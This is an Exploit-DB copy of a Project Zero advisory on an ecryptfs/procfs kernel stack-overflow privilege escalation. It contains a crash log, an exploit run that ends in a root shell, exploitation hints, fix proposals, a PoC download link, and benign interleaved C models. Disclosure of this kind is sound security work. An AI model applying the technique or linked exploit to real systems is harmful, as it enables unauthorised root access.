Linux Kernel – ‘ecryptfs’ ‘/proc/$pid/environ’ Local Privilege Escalation

  • Author: Google Security Research
    Date: 2016-06-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/39992/
  • Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836
    
    Stacking filesystems, including ecryptfs, protect themselves against
    deep nesting, which would lead to kernel stack overflow, by tracking
    the recursion depth of filesystems. E.g. in ecryptfs, this is
    implemented in ecryptfs_mount() as follows:
    
    	s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
    
    	rc = -EINVAL;
    	if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
    		pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
    		goto out_free;
    	}
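
To make the check concrete, here is a minimal userspace model of it. `struct sb_model` and `stack_on_top()` are hypothetical names invented for this sketch, not kernel APIs, and the limit of 2 is what I believe FILESYSTEM_MAX_STACK_DEPTH is defined as in include/linux/fs.h.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Assumed to match the kernel's definition in include/linux/fs.h. */
#define FILESYSTEM_MAX_STACK_DEPTH 2

/* Hypothetical stand-in for the one super_block field used by the check. */
struct sb_model {
    int s_stack_depth;
};

/*
 * Model of mounting a stacking filesystem `upper` on top of `lower`.
 * Returns 0 on success or -EINVAL when the stack would become too deep.
 */
static int stack_on_top(struct sb_model *upper, const struct sb_model *lower)
{
    assert(upper != NULL && lower != NULL);

    upper->s_stack_depth = lower->s_stack_depth + 1;
    if (upper->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH)
        return -EINVAL;
    return 0;
}
```

In this model, a filesystem of depth 0 accepts two stacked layers on top of it, and the third layer is rejected with -EINVAL.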
    
    
    The files /proc/$pid/{mem,environ,cmdline}, when read, access the
    userspace memory of the target process, involving, if necessary,
    normal pagefault handling. If it was possible to mmap() them, an
    attacker could create a chain of e.g. /proc/$pid/environ mappings
    where process 1 has /proc/2/environ mapped into its environment area,
    process 2 has /proc/3/environ mapped into its environment area and so
    on. A read from /proc/1/environ would invoke the pagefault handler for
    process 1, which would invoke the pagefault handler for process 2 and
    so on. This would, again, lead to kernel stack overflow.
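
That these files are not directly mappable can be checked from userspace. The following is a small sketch; `try_mmap()` is a helper name made up for this example. On the kernels I am aware of, the mmap() call on /proc/self/environ is expected to fail with ENODEV because the file has no mmap handler, but the exact errno is an assumption and not something the helper relies on.

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Try to map the first 4096 bytes of `path` read-only.
 * Returns 0 if mmap() succeeded, otherwise the errno of the failing call.
 */
static int try_mmap(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return errno;

    void *p = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
    int err = (p == MAP_FAILED) ? errno : 0;   /* save errno before cleanup */

    if (p != MAP_FAILED)
        munmap(p, 4096);
    close(fd);
    return err;
}
```

Calling `try_mmap("/proc/self/environ")` should return a nonzero error code, while a plain read() of the same file works.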
    
    
    One interesting fact about ecryptfs is that, because of the encryption
    involved, it doesn't just forward mmap to the lower file's mmap
    operation. Instead, it has its own page cache, maintained using the
    normal filemap helpers, and performs its cryptographic operations when
    dirty pages need to be written out or when pages need to be faulted
    in. Therefore, not just its read and write handlers, but also its mmap
    handler only uses the lower filesystem's read and write methods.
    This means that using ecryptfs, you can mmap [decrypted views of]
    files that normally wouldn't be mappable.
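
The idea can be sketched as a userspace model: the upper layer fills pages of its own cache by calling the lower file's read method, so the lower file never needs an mmap handler. All names here (`struct lower_file`, `upper_fill_page()`, `toy_decrypt()`) are hypothetical, the XOR is only a placeholder for the real cryptography, and the 16-byte page size is chosen purely for readability.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/types.h>

#define MODEL_PAGE_SIZE 16   /* tiny "page" to keep the example readable */

/* Hypothetical lower file: it offers read() only, no mmap handler. */
struct lower_file {
    ssize_t (*read)(const struct lower_file *f, void *buf, size_t len, size_t off);
    const unsigned char *data;
    size_t size;
};

/* read() implementation backed by a memory buffer. */
static ssize_t buf_read(const struct lower_file *f, void *buf, size_t len, size_t off)
{
    if (off >= f->size)
        return 0;
    if (len > f->size - off)
        len = f->size - off;
    memcpy(buf, f->data + off, len);
    return (ssize_t)len;
}

/* Placeholder for the real cipher: XOR every byte with a constant. */
static void toy_decrypt(unsigned char *page, size_t len)
{
    for (size_t i = 0; i < len; i++)
        page[i] ^= 0x5a;
}

/* Fault-in path of the upper layer: fill one cache page via the lower read(). */
static ssize_t upper_fill_page(const struct lower_file *lower,
                               unsigned char *page, size_t index)
{
    assert(lower != NULL && lower->read != NULL);

    memset(page, 0, MODEL_PAGE_SIZE);
    ssize_t n = lower->read(lower, page, MODEL_PAGE_SIZE, index * MODEL_PAGE_SIZE);
    if (n > 0)
        toy_decrypt(page, (size_t)n);
    return n;
}
```

The point of the model is that `upper_fill_page()` runs in what would be pagefault-handling context and still only needs `read`, which is exactly why a file like /proc/$pid/environ becomes mappable through the upper layer.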
    
    Combining these things, it is possible to trigger recursion with
    arbitrary depth where:
    
     - a reading userspace memory access in process A (from userland or from
       copy_from_user())
     - causes a pagefault in an ecryptfs mapping in process A, which
     - causes a read from /proc/{B}/environ, which
     - causes a pagefault in an ecryptfs mapping in process B, which
     - causes a read from /proc/{C}/environ, which
     - causes a pagefault in an ecryptfs mapping in process C, and so on.
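
The chain above can be modelled as a simple toy calculation. `fault_depth()` and `overflows_stack()` are names invented for this sketch. The 16 KiB stack size matches x86_64 kernels of this era, but the per-level stack usage passed in by the caller is a made-up parameter, not a measured value.

```c
#include <assert.h>
#include <stddef.h>

#define NO_BACKING ((size_t)-1)

/*
 * backing[i] is the index of the process whose /proc/<pid>/environ backs
 * process i's environment area through ecryptfs, or NO_BACKING if the
 * area is ordinary memory. Returns the number of nested pagefaults that
 * a read of process `start`'s environment area triggers. The count is
 * capped at nprocs so that a cyclic chain terminates in this model.
 */
static size_t fault_depth(const size_t *backing, size_t nprocs, size_t start)
{
    size_t depth = 0;
    size_t cur = start;

    while (cur != NO_BACKING && depth < nprocs) {
        assert(cur < nprocs);
        depth++;
        cur = backing[cur];
    }
    return depth;
}

/* Nonzero if `depth` nested levels no longer fit into the kernel stack. */
static int overflows_stack(size_t depth, size_t bytes_per_level, size_t stack_size)
{
    return depth * bytes_per_level > stack_size;
}
```

For example, with an assumed cost of 1024 bytes per level and a 16384-byte stack, a chain of 3 processes is harmless in this model while a chain of 20 is not. Since the attacker controls the number of processes, the depth is effectively unbounded.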
    
    On systems with the /sbin/mount.ecryptfs_private helper installed
    (e.g. Ubuntu if the "encrypt my home directory" checkbox is ticked
    during installation), this bug can be triggered by an unprivileged
    user. The mount helper considers /proc/$pid, where $pid is the PID of
    a process owned by the user, to be a valid mount source because the
    directory is "owned" by the user.
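
As an illustration of why such a check passes, here is a simplified ownership test. It is a stand-in written for this example, not the helper's actual code, and `dir_owned_by()` is a hypothetical name. Because /proc/$pid reports the UID of the process owner in stat(), a check of this shape accepts it like any other directory the user owns.

```c
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Returns 1 if `path` is a directory owned by `uid`, 0 if it is not,
 * and -1 if stat() fails.
 */
static int dir_owned_by(const char *path, uid_t uid)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    return S_ISDIR(st.st_mode) && st.st_uid == uid;
}
```

For a normal user process, `dir_owned_by("/proc/self", getuid())` would typically return 1, although nothing about that directory behaves like an ordinary directory on disk.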
    
    I have attached both a generic crash PoC and a build-specific exploit
    that can be used to gain root privileges from a normal user account on
    Ubuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version
    4.4.0-22.40, uname "Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu
    SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux".
    
    dmesg output of the crasher:
    
    ```
    [ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0
    [ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
    [ 80.040028] PGD 1e0d067 PUD 0 
    [ 80.040028] Thread overran stack, or stack corrupted
    [ 80.040028] Oops: 0000 [#1] SMP 
    [ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video
    [ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu
    [ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
    [ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000
    [ 80.040028] RIP: 0010:[<ffffffff810c9a33>]  [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
    [ 80.040028] RSP: 0000:ffff88021fc03d70  EFLAGS: 00010046
    [ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068
    [ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200
    [ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000
    [ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200
    [ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68
    [ 80.040028] FS:  00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000
    [ 80.040028] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0
    [ 80.040028] Stack:
    [ 80.040028]  ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00
    [ 80.040028]  ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68
    [ 80.040028]  ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200
    [ 80.040028] Call Trace:
    [ 80.040028]  <IRQ>
    [ 80.040028]  [<ffffffff810b4b83>] update_curr+0xe3/0x160
    [ 80.040028]  [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0
    [ 80.040028]  [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80
    [ 80.040028]  [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0
    [ 80.040028]  [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0
    [ 80.040028]  [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60
    [ 80.040028]  [<ffffffff810ee961>] update_process_times+0x51/0x60
    [ 80.040028]  [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60
    [ 80.040028]  [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70
    [ 80.040028]  [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290
    [ 80.040028]  [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0
    [ 80.040028]  [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60
    [ 80.040028]  [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50
    [ 80.040028]  [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90
    [ 80.040028]  <EOI>
    [ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d 
    [ 80.040028] RIP  [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
    [ 80.040028]  RSP <ffff88021fc03d70>
    [ 80.040028] CR2: fffffffe4b9145c0
    [ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
    [ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
    [ 80.040028] ---[ end trace 616e3de50958c35b ]---
    [ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt
    [ 80.040028] Shutting down cpus with NMI
    [ 80.040028] Kernel Offset: disabled
    [ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt
    ```
    
    example run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:
    
    ```
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
    compile.sh  exploit.c  hello.c  suidhelper.c
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh 
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
    compile.sh  exploit  exploit.c  hello  hello.c  suidhelper  suidhelper.c
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit
    all spammers ready
    recurser parent ready
    spam over
    fault chain set up, faulting now
    writing stackframes
    stackframes written
    killing 2494
    post-corruption code is alive!
    children should be dead
    coredump handler set. recurser exiting.
    going to crash now
    suid file detected, launching rootshell...
    we have root privs now...
    root@user-VirtualBox:/proc# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
    ```
    
    (If the exploit crashes even with the right kernel version, try
    restarting the machine. Also, ensure that no program like top/htop/...
    is running that might try to read process command lines. Note that
    the PoC and the exploit don't really clean up after themselves and
    leave mountpoints behind that prevent them from re-running without
    a reboot or manual unmounting.)
    
    Note that Ubuntu compiles its kernel with CONFIG_SCHED_STACK_END_CHECK
    turned on, which makes it harder than it used to be to exploit this
    bug without crashing the kernel. An overwrite of addr_limit would also
    be useless: at the time the thread_info is overwritten, there are
    multiple instances of kernel_read() on the stack, and each of them
    resets addr_limit to the value it saved on entry when it returns.
    Still, the bug is exploitable by carefully aligning the stack so that
    the vital components of thread_info are preserved, stopping with an
    out-of-bounds stack pointer, and overwriting the thread stack using a
    normal write to an adjacent allocation of the buddy allocator.
    
    Regarding the fix, I think the following would be reasonable:
    
     - Explicitly forbid stacking anything on top of procfs by setting its
       s_stack_depth to a sufficiently large value. In my opinion, there
       is too much magic going on inside procfs to allow stacking things
       on top of it, and there isn't any good reason to do it. (For
       example, ecryptfs invokes open handlers from a kernel thread
       instead of normal user process context, so the access checks inside
       VFS open handlers are probably ineffective - and procfs relies
       heavily on those.)
    
     - Forbid opening files with f_op->mmap==NULL through ecryptfs. If the
       lower filesystem doesn't expect to be called in pagefault-handling
       context, it probably shouldn't be called in that context.
    
     - Create a dedicated kernel stack cache outside of the direct mapping
       of physical memory that has a guard page (or a multi-page gap) at
       the bottom of each stack, and move the struct thread_info to a
       different place (if nothing else works, the top of the stack, above
       the pt_regs).
       While e.g. race conditions are more common than stack overflows in
       the Linux kernel, the whole vulnerability class of stack overflows
       is easy to mitigate, and the kernel is sufficiently complicated for
       unbounded recursion to emerge in unexpected places - or perhaps
       even for someone to discover a way to create a stack with a bounded
       length that is still too high. Therefore, I believe that guard
       pages are a useful mitigation.
       Nearly everywhere, stack overflows are caught using guard pages
       nowadays; this includes Linux userland, but also {### TODO ###}
       and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).
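
For readers unfamiliar with the guard page technique, this is roughly how it looks in userland. It is only an illustration of the concept using mmap() and mprotect(), not a proposal for how the kernel should allocate its stacks, and `struct guarded_stack` and its helpers are names made up for this sketch.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* for MAP_ANONYMOUS under strict -std= modes */
#endif
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

struct guarded_stack {
    void *base;     /* start of the mapping; the first page is the guard */
    size_t total;   /* mapping length including the guard page */
    void *lowest;   /* lowest usable stack address, just above the guard */
};

/* Allocate `usable` bytes of stack with one inaccessible page below it. */
static int guarded_stack_alloc(struct guarded_stack *gs, size_t usable)
{
    long page = sysconf(_SC_PAGESIZE);
    assert(gs != NULL && page > 0);

    size_t pg = (size_t)page;
    size_t total = usable + pg;
    void *base = mmap(NULL, total, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return -1;

    /* Any access that runs off the bottom of the stack now faults. */
    if (mprotect(base, pg, PROT_NONE) != 0) {
        munmap(base, total);
        return -1;
    }

    gs->base = base;
    gs->total = total;
    gs->lowest = (char *)base + pg;
    return 0;
}

static void guarded_stack_free(struct guarded_stack *gs)
{
    munmap(gs->base, gs->total);
}
```

With such a layout, an overflow hits the PROT_NONE page and faults immediately instead of silently corrupting whatever happens to be allocated below the stack.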
    
    Oh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`
    in schedule_debug() ought to be a direct panic instead of an oops. At
    the moment, when you hit it, you get a recursion between the scheduler
    invocation in do_exit() and the BUG_ON in the scheduler, and the
    kernel recurses down the stack until it hits something sufficiently
    important to cause a panic.
    
    I'm going to send (compile-tested) patches for my first two fix
    suggestions and the recursive oops bug. I haven't written a patch for
    the guard pages mitigation - I'm not familiar enough with the x86
    subsystem for that.
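
As a rough userspace model of what the first two suggestions amount to (this is not the patch text, and every name below is hypothetical): procfs declares itself to be at maximum stacking depth, and the stacking layer refuses lower files that have no mmap handler. The error code returned from `stacking_open()` is chosen arbitrarily for this sketch.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Assumed to match the kernel's definition in include/linux/fs.h. */
#define FILESYSTEM_MAX_STACK_DEPTH 2

struct sb_sketch {
    int s_stack_depth;
};

struct file_sketch {
    int has_mmap;   /* models f_op->mmap != NULL */
};

/* Suggestion 1: procfs marks itself as already being at maximum depth. */
static void procfs_init_sb(struct sb_sketch *sb)
{
    assert(sb != NULL);
    sb->s_stack_depth = FILESYSTEM_MAX_STACK_DEPTH;
}

/* The existing depth check of a stacking filesystem, unchanged. */
static int stacking_mount(struct sb_sketch *upper, const struct sb_sketch *lower)
{
    upper->s_stack_depth = lower->s_stack_depth + 1;
    if (upper->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH)
        return -EINVAL;
    return 0;
}

/* Suggestion 2: refuse lower files that cannot be mapped directly. */
static int stacking_open(const struct file_sketch *lower)
{
    if (!lower->has_mmap)
        return -EINVAL;   /* arbitrary error code for this sketch */
    return 0;
}
```

In this model, mounting on top of procfs fails in the existing depth check without any change to the stacking filesystem itself, and a lower file like /proc/$pid/environ would additionally be rejected at open time.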
    
    
    Notes regarding the exploit:
    
    It makes an invalid assumption that causes it to require at least around 6GB of RAM.
    
    It has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.
    
    The page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.
    
    
    Proof of Concept:
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39992.zip